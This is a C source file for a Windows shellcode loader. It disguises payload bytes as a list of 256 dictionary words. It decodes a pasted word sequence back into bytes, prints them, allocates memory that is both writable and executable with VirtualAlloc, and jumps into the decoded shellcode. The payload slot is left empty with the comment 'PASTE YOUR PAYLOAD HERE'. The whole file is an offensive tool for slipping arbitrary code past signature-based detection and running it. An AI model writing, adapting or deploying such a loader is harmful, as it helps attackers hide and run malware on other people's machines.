#include <stdio.h>
#include <string.h>
#include <windows.h>

int main() {
    char* dictionary[] = {
    "zoophyte",
    "zoophytes",
    "zoophytic",
    "zoophytical",
    "zoophytish",
    "zoophytography",
    "zoophytoid",
    "zoophytology",
    "zoophytological",
    "zoophytologist",
    "zoophobe",
    "zoophobes",
    "zoophobia",
    "zoophobous",
    "zoophori",
    "zoophoric",
    "zoophorous",
    "zoophorus",
    "zooplankton",
    "zooplanktonic",
    "zooplasty",
    "zooplastic",
    "zoopraxiscope",
    "zoopsia",
    "zoopsychology",
    "zoopsychological",
    "zoopsychologist",
    "zoos",
    "zooAs",
    "zooscopy",
    "zooscopic",
    "zoosis",
    "zoosmosis",
    "zoosperm",
    "zoospermatic",
    "zoospermia",
    "zoospermium",
    "zoosperms",
    "zoospgia",
    "zoosphere",
    "zoosporange",
    "zoosporangia",
    "zoosporangial",
    "zoosporangiophore",
    "zoosporangium",
    "zoospore",
    "zoospores",
    "zoosporic",
    "zoosporiferous",
    "zoosporocyst",
    "zoosporous",
    "zoosterol",
    "zootaxy",
    "zootaxonomist",
    "zootechny",
    "zootechnic",
    "zootechnical",
    "zootechnician",
    "zootechnics",
    "zooter",
    "zoothecia",
    "zoothecial",
    "zoothecium",
    "zootheism",
    "zootheist",
    "zootheistic",
    "zootherapy",
    "zoothome",
    "zooty",
    "zootic",
    "zootype",
    "zootypic",
    "Zootoca",
    "zootomy",
    "zootomic",
    "zootomical",
    "zootomically",
    "zootomies",
    "zootomist",
    "zoototemism",
    "zootoxin",
    "zootrophy",
    "zootrophic",
    "zoot-suiter",
    "zooxanthella",
    "zooxanthellae",
    "zooxanthin",
    "zoozoo",
    "Zophar",
    "zophophori",
    "zophori",
    "zophorus",
    "zopilote",
    "Zoque",
    "Zoquean",
    "Zora",
    "Zorah",
    "Zorana",
    "Zoraptera",
    "zorgite",
    "zori",
    "zoril",
    "zorilla",
    "zorillas",
    "zorille",
    "zorilles",
    "Zorillinae",
    "zorillo",
    "zorillos",
    "zorils",
    "Zorina",
    "Zorine",
    "zoris",
    "Zorn",
    "Zoroaster",
    "zoroastra",
    "Zoroastrian",
    "Zoroastrianism",
    "zoroastrians",
    "Zoroastrism",
    "Zorobabel",
    "Zorotypus",
    "zorrillo",
    "zorro",
    "Zortman",
    "zortzico",
    "Zosema",
    "Zoser",
    "Zosi",
    "Zosima",
    "Zosimus",
    "Zosma",
    "zoster",
    "Zostera",
    "Zosteraceae",
    "Zosteria",
    "zosteriform",
    "Zosteropinae",
    "Zosterops",
    "zosters",
    "Zouave",
    "zouaves",
    "Zoubek",
    "Zoug",
    "zounds",
    "zowie",
    "ZPG",
    "ZPRSN",
    "Zr",
    "Zrich",
    "Zrike",
    "zs",
    "zAs",
    "Zsa",
    "Zsazsa",
    "Z-shaped",
    "Zsigmondy",
    "Zsolway",
    "ZST",
    "ZT",
    "Ztopek",
    "Zubeneschamali",
    "Zubird",
    "Zubkoff",
    "zubr",
    "Zuccari",
    "zuccarino",
    "Zuccaro",
    "Zucchero",
    "zucchetti",
    "zucchetto",
    "zucchettos",
    "zucchini",
    "zucchinis",
    "zucco",
    "zuchetto",
    "Zucker",
    "Zuckerman",
    "zudda",
    "zuffolo",
    "zufolo",
    "Zug",
    "zugtierlast",
    "zugtierlaster",
    "zugzwang",
    "Zui",
    "Zuian",
    "Zuidholland",
    "zuisin",
    "Zulch",
    "Zuleika",
    "Zulema",
    "Zulhijjah",
    "Zulinde",
    "Zulkadah",
    "ZuAlkadah",
    "Zullinger",
    "Zullo",
    "Zuloaga",
    "Zulu",
    "Zuludom",
    "Zuluize",
    "Zulu-kaffir",
    "Zululand",
    "Zulus",
    "zumatic",
    "zumbooruk",
    "Zumbrota",
    "Zumstein",
    "Zumwalt",
    "Zungaria",
    "Zuni",
    "Zunian",
    "zunyite",
    "zunis",
    "zupanate",
    "Zupus",
    "Zurbar",
    "Zurbaran",
    "Zurek",
    "Zurheide",
    "Zurich",
    "Zurkow",
    "zurlite",
    "Zurn",
    "Zurvan",
    "Zusman",
    "Zutugil",
    "zuurveldt",
    "zuza",
    "Zuzana",
    "Zu-zu",
    "zwanziger",
    "Zwart",
    "ZWEI",
    "Zweig",
    "Zwick",
    "Zwickau",
    "Zwicky",
    "Zwieback",
    "zwiebacks",
    "Zwiebel",
    "zwieselite",
    "Zwingle",
    "Zwingli",
    "Zwinglian",
    "Zwinglianism",
    "Zwinglianist",
    "zwitter",
    "zwitterion",
    "zwitterionic",
    "Zwolle",
    "Zworykin",
    "ZZ",
    "zZt",
    "ZZZ"};
    unsigned char* code[] = {}; // PASTE YOUR PAYLOAD HERE

    unsigned char c[3000] = {0};  // Ensure it's zero-initialized
    int code_size = sizeof(code) / sizeof(code[0]);

    int c_index = 0;
    for (int i = 0; i < code_size; i++) {
        for (int j = 0; j < 256; j++) {
            if (strcmp((char*)code[i], dictionary[j]) == 0) {
                c[c_index++] = (unsigned char)j;
                break;
            }
        }
    }

    printf("Decoded shellcode (%d bytes):\n", c_index);
    for (int i = 0; i < c_index; i++) {
        printf("\\x%02x", c[i]);
    }
    printf("\n");

    // Allocate memory and execute the shellcode
    void *exec = VirtualAlloc(0, c_index, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        printf("VirtualAlloc failed.\n");
        return -1;
    }

    memcpy(exec, c, c_index);
    ((void(*)())exec)();  // Execute the shellcode

    return 0;
}